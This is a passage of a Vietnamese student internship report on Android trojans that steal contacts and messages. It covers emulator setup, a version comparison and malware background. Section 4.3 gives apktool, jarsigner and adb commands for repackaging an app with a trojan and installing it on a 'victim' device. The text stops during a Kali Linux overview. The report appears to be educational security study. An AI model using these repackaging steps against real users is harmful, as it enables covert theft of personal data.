Bao cao cuoi li

53
TRƯỜNG ĐẠI HC KHOA HC TNHIÊN TP.HCM KHOA ĐIỆN TVIN THÔNG BÁO CÁO ĐỀ TÀI THỰC TẬP ĐỀ TÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI Nơi thực tp : TT.QUN TRMNG & AN NINH MNG QUC TATHENA GVHD : VÕ ĐỖ THẮNG SVTH : LÊ TRN XUÂN LNH MSSV : 1120085 TP.HCM -Tháng 10 / 2014

Transcript of Bao cao cuoi li

TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN TP.HCM

KHOA ĐIỆN TỬ VIỄN THÔNG

BÁO CÁO ĐỀ TÀI THỰC TẬP

ĐỀ TÀI :

NGHIÊN CỨU CÁC TROJAN, MALWARE CHO

PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH

CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI

SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI

Nơi thực tập :

TT.QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ

ATHENA

GVHD : VÕ ĐỖ THẮNG

SVTH : LÊ TRÂN XUÂN LANH

MSSV : 1120085

TP.HCM -Tháng 10 / 2014

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 1

LỜI CAM ĐOAN

Em xin cam đoan:

Những nội dung trong báo cáo này là do em thực hiện dưới sự hướng dẫn trực

tiếp của thầy Võ Đỗ Thắng.

Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả,

tên công trình, thời gian, địa điểm công bố.

Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu

hoàn toàn trách nhiệm.

TPHCM, ngày 25 tháng 09 năm 2014

Sinh viên thực tập

Lê Trần Xuân Lanh

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 2

LỜI CẢM ƠN

KHOA ĐIỆN TỬ VIỄN THÔNG

Em xin chân thành cảm ơn trường đại học Khoa học tự nhiên và khoa Điện tử

viễn thông đa chỉ dạy những kiến thức nền quý báu, tạo điều kiện cho em hoàn thành

tốt đợt thực tập này.Đợt thực tập này đa giúp cho em đúc kết được rất nhiều kinh

nghiệm cho bản thân. Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công

việc và môi trường làm việc sau này.

Trong đợt thực tập này, em đa nỗ lực hết mình để có thể đạt được kết quả tốt

nhất.Nhưng, bên cạnh đó chắc chắn em không thể tránh khỏi những thiếu sót nhất

định.Em rất mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa trong

tương lai.

Một lần nữa em xin chân thành cảm ơn.

TPHCM, ngày 25 tháng 09 năm 2014

Sinh viên thực tập

Lê Trần Xuân Lanh

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 3

LỜI CẢM ƠN

TRUNG TÂM ATHENA

Em xin gởi lời cảm ơn chân thành và sự tri ân sâu sắc đối với Thầy và các anh

chị nhân viên đa tạo điều kiện cho em thực tập ở Athena để thực tập. Và em cũng xin

chân thành cám ơn Thầy Võ Tất Thắng đa nhiệt tình hướng dẫn hướng dẫn em hoàn

thành tốt khóa thực tập.

Trong quá trình thực tập, cũng như là trong quá trình làm bài báo cáo, khó tránh

khỏi sai sót, rất mong các Thầy bỏ qua. Đồng thời do trình độ lý luận cũng như kinh

nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót,

em rất mong nhận được ý kiến đóng góp củaThầy để em học thêm được nhiều kinh

nghiệm .

Em xin chân thành cảm ơn !

Thầy Võ Đỗ Thắng (bên phải) cùng SVTT Lê Trần Xuân Lanh (bên trái)

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 4

NHẬN XÉT CỦA KHOA

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Chủ nhiệm khoa

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 5

ĐÁNH GIÁ CỦA GVHD:

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

.........................................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Giáo viên hướng dẫn Giáo viên hướng dẫn

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 6

GIỚI THIỆU

- Số lượng các báo cáo về nguy cơ an ninh trên các thiết bị di động Android từ các

công ty nghiên cứu bảo mật gia tăng cho thấy hệ điều hành này đang là đích nhắm cho

tin tặc cùng các phần mềm độc hại.

- Không quá khó khăn và cũng không cần thiết phải có những nghiên cứu chi tiết để

nhận ra rằng hệ điều hành Android đang bị tấn công nhiều hơn. Chỉ cần nhìn vào

trường hợp facebook, khi mạng xã hội này trở nên nổi tiếng và có số lượng người dùng

đông đảo, lập tức nó trở thành đích ngắm của các tin tặc.Giới tội phạm mạng luôn tìm

mọi cách để lợi dụng các lỗ hổng bảo mật của những hệ điều hành được cài đặt trên số

đông thiết bị. Và điểm yếu cố hữu trong an ninh bảo mật vẫn nằm ở người dùng rồi

mới đến thiết bị. Các nhà nghiên cứu bảo mật cho biết hiện có quá nhiều người dùng

Android bất cẩn luôn tải về ứng dụng mà không thèm kiểm tra tìm hiểu trước xem

chúng có an toàn hay không.

- Vậy để biết thêm phần nào về cách thức mà các tin tặc tấn công các thiết bị Android

đồng thời để hạn chế được điều này, em xin mời thầy và các bạn cùng đi đến bài báo

cáo của em.

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 7

MỤC LỤC PHẦN I: GIỚI THIỆU VỀ NƠI THỰC TẬP .................................................................................. 8

I. Giới thiệu về Trung tâm Athena .................................................................................................. 8

II. Trụ sở và các chi nhánh ............................................................................................................ 8

III. Cơ cấu tổ chức:........................................................................................................................ 9

PHẦN II: BAO CAO ĐỀ TAI ...................................................................................................... 10

I. Nghiên cứu hệ điều hành Android trên môi trường giả lập........................................................... 10

1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập. ........................................ 10

1.1 Cài đặt Java trên máy tính. .............................................................................................. 10

1.2 Download và Cài đặt Eclipse, Android SDK.................................................................... 12

1.3 Tạo máy AVD (Android Virtual Device).......................................................................... 14

2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x............................................... 17

2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.................................................... 17

2.2. Sự khác nhau về giao diện. ............................................................................................. 18

2.3. Sự khác nhau về tính năng. ............................................................................................ 19

2.4. Sự khác nhau về giao thức mạng. ................................................................................... 20

3. Nghiên cứu cài đặt trojan , backdoor trên thiết bị Android (iMatch) .................................... 20

4. Nghiên cứu các chương trình có ma đọc trên Android (iCalendar) ..................................... 20

4.1. Thực trạng.................................................................................................................... 20

4.2. Nghiên cứu lỗ hổng bảo mật trên Android. ..................................................................... 21

4.3. Cài đặt trojan trên Android (iCalendar) .......................................................................... 22

5. Nghiên cứu Kali Linux – các cơ chế tạo ma độc trên Kali –Linux , từ đó xâm nhập thẻ Sd

card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa ...... 23

5.1 Tìm hiểu Kali Linux ....................................................................................................... 23

5.2 Cài đặt Kali Linux trên máy ảo VMWare ......................................................................... 24

5.3 Tạo ma độc trên Kali Linux để xâm nhập Android ........................................................... 32

II. Thực hiện trên môi trường internet .......................................................................................... 43

1. Cài ma độc trên VPS........................................................................................................... 43

1.1 Giới thiệu Metasploit lên VPS ....................................................................................... 43

1.2 Cài đặt .......................................................................................................................... 43

2. Từ VPS điều khiển thiết bị qua internet ............................................................................... 47

III. Tổng kết:............................................................................................................................... 52

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 8

PHẦN I: GIỚI THIỆU VỀ NƠI THỰC TẬP

I. Giới thiệu về Trung tâm Athena

- Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền

thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu

viết tắt là TRUNG TÂM ĐAO TẠO ATHENA), được chính thức thành lập theo giấy

phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày

04 tháng 11 năm 2008.

-Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING

NETWORK SECURITY COMPANY LIMITED

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt

huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin.Với quyết tâm góp phần vào

công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đa và đang tập

trung chủ yếu vào các họat động sau:

- Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy

tính, internet, bảo mật và thương mại điện tử….

- Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất

kinh doanh.

- Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia

về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp

có nhu cầu.

- Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ

liệu thông tin về các ứng dụng và sự cố mạng.

- Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra

sự cố máy tính.

II. Trụ sở và các chi nhánh

- Trụ sở chính:

+ Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế

ATHENA.92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt

Nam.

+ Website: www.athena.com.vn

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 9

+ Điện thoại: ( 84-8 ) 3824 4041

+ Hotline: 0943 23 00 99

- Cơ sở 2_Tại TP Hồ Chí Minh:

+ Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

Số 2 Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.

+ Website: www.Athena.Edu.Vn

+ Điện thoại: ( 84-8 ) 2210 3801

+ Hotline: 0943 20 00 88

- Chi nhánh Nha Trang:

+ Điện thoại : 08. 3824 4041 - Fax: 08. 39 111 692

+ Website: www.athena.edu.vn

+ Email :[email protected]

III. Cơ câu tô chưc:

- Sơ đồ tổ chức công ty:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 10

PHẦN II: BAO CAO ĐỀ TAI

I. Nghiên cưu hệ điều hành Android trên môi trường giả lập.

1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập.

1.1 Cài đặt Java trên máy tính.

- Để có thể lập trình được App cho Android thì trên máy tính của bạn phải đặt toàn bộ

JDK. Bạn có thể download bộ JDK tại địa chỉ : tại đây.

(Tùy vào phiên bản windows của bạn là 32bit hay là 64bit bạn cần download

cho phù hợp)

- Sau khi tải bộ JDK về máy.các bạn tiến hành cài đặt chúng.

- Xuất hiện cửa dổ cài đặt, các bạn cứ ấn Next…

- Và đợi cho tới khi quá trình cài đặt hoàn tất.

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 11

- Sau khi cài xong, các bạn có thể kiểm tra lại xem bộ JDK đa cài được trên máy tính

của bạn chưa bẳng cách vào CMD và gõ lệnh: “java”

- Nếu màn hình hiện ra như sau là bạn đa hoàn thành rồi:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 12

1.2 Download và Cài đặt Eclipse, Android SDK.

- Trước tiên ta phải download bộ Eclipse.

+ Các bạn vào địa chỉ : http://developer.android.com/sdk/index.html

+ Download bộ cài đầy đủ bao gồm Eclipse và Android SDK : ADT Bundle

for Windows

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 13

- Sau khi download về, các bạn giải nén ra và sẽ có các file như sau :

- Để cài đặt Android SDK các bạn có 2 cách:

+ Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và tiến

hành cài đặt.

+ Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK

Manager cũng được:

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 14

- Sẽ xuất hiện 1 cửa sổ mới như sau :

- Công việc tiếp theo là các bạn chỉ cần tích chọn các phần API cần cài rồi click vào

nút :Install packages ở góc dưới bên phải và chờ cho nó download và cài đặt là xong.

1.3Tạo máy AVD (Android Virtual Device).

- Đầu tiên bạn khởi chạy Eclipse lên.

- Các bạn có thể xem hướng dẫn cách cài đặt Eclipse và Android SDK ở phần

hướng dẫn trước.

- Sau khi khởi chạy xong Eclipse.

+Bạn vào : Windows ->Android Virtual Device Manager.

+Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu

của Eclipse :

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 15

- Click vào New để tạo mới :

- Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu :

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 16

AVD Name : Các bạn chỉ được sử dụng cách ký tự : A -> Z, a -> z, và “., -, _”

mà thôi.

Target : Bạn chọn phiên bản Android để test.

SD Card : Là dung lượng bộ nhớ ảo của thẻ SD.

Và một số thông tin khác…

Các bạn click OK để hoàn thành tạo mới một AVD.

Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì bạn

sẽ thấy tên máy ảo mới mình vừa tạo rồi.

Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời gian

để máy ảo khởi chạy) :

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 17

2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x.

2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.

Android 2.3 Android 4x

Cần ít nhất 128 MB bộ nhớ có sẵn cho

Kernel và cho không gian người sử dụng

Cần ít nhất 340 MB bộ nhớ có sẵn cho

kernel và cho không gian người sử dụng

Dung lượng Ram tối thiểu cần thiết là

150MB

Dung lượng Ram tối thiểu cần thiết là 350

MB

Màn hình:

- Màn hình phải có kích cỡ ít nhất 2,5 inch

- Mật độ phải được ít nhất 100 dpi

- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779

Màn hình:

- Màn hình phải có kích cỡ ít nhất

426x320

- Mật độ phải được ít nhất 100 dpi

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 18

(16:9)

- Công nghệ màn hình được sử dụng là

công nghệ “ Square pixels”

- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85

(16:9)

Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý

Các API Android bao gồm trình

quản lý download các ứng dụng có thể sử

dụng để tải dữ liệu.Trình quản lí download

phải có khả năng tải tập tin có dung lượng ít

nhất 55 MB

Các API Android bao gồm trình

quản lý download các ứng dụng có thể sử

dụng để tải dữ liệu.Trình quản lí download

phải có khả năng tải tập tin có dung lượng ít

nhất 100 MB

2.2. Sự khác nhau về giao diện.

- Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng

cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn

và thu lại để xử lý các đối tượng trên màn hình.Sự phản ứng với tác động của người

dùng diễn ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường

dùng tính năng rung của thiết bị để tạo phảnhồi rung cho người dùng. Những thiết bị

phần cứng bên trong như gia tốckế, con quay hồi chuyển và cảm biến khoảng cách

được một số ứng dụng sử dụng để phản hồi một số hành động khác của người dùng, ví

dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo

vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như

Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu

với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn

làm việc) trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng

(icon) và tiện ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng, còn tiện

ích hiển thị những nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư

của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính. Màn hình

chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao

diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự

do sắp đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do

các hãng thứ ba có trên Google Play và các kho ứng dụng khác còn cho phép người

dùng thay đổi "chủ đề" của màn hình chính, thậm chí bắt chước hình dáng của hệđiều

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 19

hành khác như Windows Phone chẳng hạn. Phần lớn những nhà sản xuất, và một số nhà

mạng, thực hiện thay đổi hình dáng và hành vi của các thiết bị Android của họ để phân

biệt với các hãng cạnh tranh. Ở phía trên cùng màn hình là thanh trạng thái, hiển thị

thông tin về thiết bị và tình trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để

xem màn hình thông báo gồm thông tin quan trọng hoặc cập nhật của các ứng dụng, như

email hay tin nhắn SMS mới nhận, mà không làm gián đoạn hoặc khiến người dùng

cảm thấy bất tiện.Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo

để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính

năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải

mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đa đọc

hoặc xóa nó đi.

Android 2.3 Android 4x

Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt

hơn

Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Zoom

Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà

không cần mở ứng dụng

2.3. Sự khác nhau về tính năng.

Android 2.3 Android 4x

Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet

Chỉ có thể xóa tất các các thông báo cùng

lúc trên trình quản lý

Chỉ có thể xóa riêng rẽ các thông báo cùng lúc

trên trình quản lý

Chỉ có thể trả lời, ngắt cuộc gọi khi màn

hình bị khóa

Có thể thực hiện thêm 1 số tính năng khi màn

hình bị khoái ngoài trả lời , ngắt cuộc gọi như

gửi tin nhắn

Không có tính năng mở khóa màn hình

nhận diện khuôn mặt

Có tính năng mở khóa màn hình nhận diện

khuôn mặt

Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện

được tất cả các camera trên thiết bị

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 20

2.4. Sự khác nhau về giao thức mạng.

Android 2.3 Android 4x

Không hỗ trợ giao thức https Hỗ trợ giao thức https

3. Nghiên cứu cài đặt trojan , backdoor trên thiết bị Android (iMatch)

Ứng dụng iMatch đa được minh họa cách cài đặt qua clip đính kèm

4. Nghiên cứu các chương trình có mã đọc trên Android (iCalendar)

4.1. Thực trạng

- Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của ma độc trên

Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng ma độc

mới được phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng

Android. Đây là một con số báo động về tình trạng ma độc trên nền tảng di động của

Google vừa được hãng bảo mật Kaspersky Lab công bố.

- Phần lớn trong số các loại ma độc trên Android là virus trojan, một dạng virus chủ

yếu để sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ

những tin nhắn lừa đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn

cắp thông tin như là mật khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được

cho phép, ….. Loại ma độc này chiếm đến 63% tổng số các loại ma độc mới được phát

tán trên Android trong quý I năm 2013.

- Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số

lượng các ma độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013,

Kaspersky đa phát hiện được số lượng ma độc mới trên các nền tảng di độngbằng tổng

số lượng ma độc được phát hiện trong cả năm 2012 mà Android là nền tảng chịu ảnh

hưởng nặng nhất.

- Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các

loại ma độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực

bảo mật, khi sự phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc,

đồng thời việc quản lý các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện

cho ma độc được phát tán dễ dàng hơn trên nền tảng di động này.

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 21

- Bên cạnh lĩnh vực ma độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong

quý I/2013 của Kaspersky cũng cho biết 91% các vụ phát tán ma độc chủ yếu

dựa vào việc phát tán các đường link trang web có chứa ma độc. Các đường link có

chứa ma độc này chủ yếu được phát tán thông qua email và trên các mạng xã hội như

Facebook, Twitter… Đây được xem là biện pháp được yêu thích nhất hiện nay của

hacker.

4.2. Nghiên cứu lỗ hổng bảo mật trên Android.

Malware trên Android.

- Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần

mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà

người sử dụng không hề hay biết.

- Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới

chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ

chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức

hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus

phá hủy.

Cơ chế hoạt động của Malware.

- Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là

Malware DroidDream. Malware này hoạt động qua 2 giai đoạn:

+ Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng

ứng dụng chứa Malware này hiện đa nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền

root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu

tiên.

+ Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt

cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các

thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một

khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt

một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống.

Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài

đặt các ứng dụng mà không được phép.

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 22

- Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu

việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm,

checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là

Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào

khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà

điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn

hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình.

Mục đích của Malware DroidDream

- DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích

của con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của

người dùng tự động cài đặt những ứng dụng chứa ma độc khác. Tuy nhiên các biến thể

của nó đa kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như

Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho

phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một

cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là

Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch

vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1

lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng

thực sẽ bị thu thập bởi các malware này.

- Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại.

Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một

theo dõi, vì vậy những mối nguy hiểm từ ma độc trên android đang thực sự đe dọa đến

an sự an toàn của người dùng hệ điều hành này.

4.3. Cài đặt trojan trên Android (iCalendar)

1.Dùng công cụ apktool để chỉnh sửa file apk

apktool if name.apk

apktool d name.apk

apktool b name

2.Signing ứng dụng, tạo chữ ký điện tử để thiết bị có thể sử dụng được ứng dụng

keytool -genkey -v -keystore name-name.keystore -alias name -keyalg RSA -

keysize 2048 -validity 10000

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 23

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore name-

name.keystore name.apk name

jarsigner -verify -verbose -certs name.apk

3.Cài đặt ứng dụng lên máy nạn nhân

adb -s emulator-device install name.apk

Demo cài đặt ứng dụng Icalendar và đa được minh họa trên clip đính kèm

5. Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali –Linux , từ đó xâm nhập

thẻ Sd card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều

khiển từ xa

5.1 Tìm hiểu Kali Linux

- Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để

kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính.Tiền thân của Kali

Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa

chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hang Offensive

Security đa công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như

phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ

thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.

Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và

Kali.So với BackTrack, Kali có rất nhiều cải tiến:

Kali phát triển trên nền tảng hệ điều hành Debian

- Điều này có nghĩa Kali có rất nhiều ưu điểm.Đầu tiên là các Repository (Kho lưu trữ

phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có

được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository.Duy trì cập

nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan

trọng.

- Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của

Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc

hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét

hoặc thay đổi mã nguồn của các công cụ.

Tính tương thích kiến trúc

Báo Cáo Thực Tập SVTH: Lê Trân Xuân Lanh

Trang 24

- Một ưu điểm quan trọng trong Kali là nó đa cải tiến khả năng tương thích với kiến

trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đa được tạo ra. Giờ đây ta

có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.

Hỗ trợ mạng không dây tốt hơn

- Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là

sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay

USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá

mạng không dây.

Khả năng tùy biến cao

- Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với

giao diện, giờ đây người dùng đa có thể chọn cho mình nhiều loại Desktops như

GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.

Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

- Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều

hành Kali.Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta

đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).

- Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đa

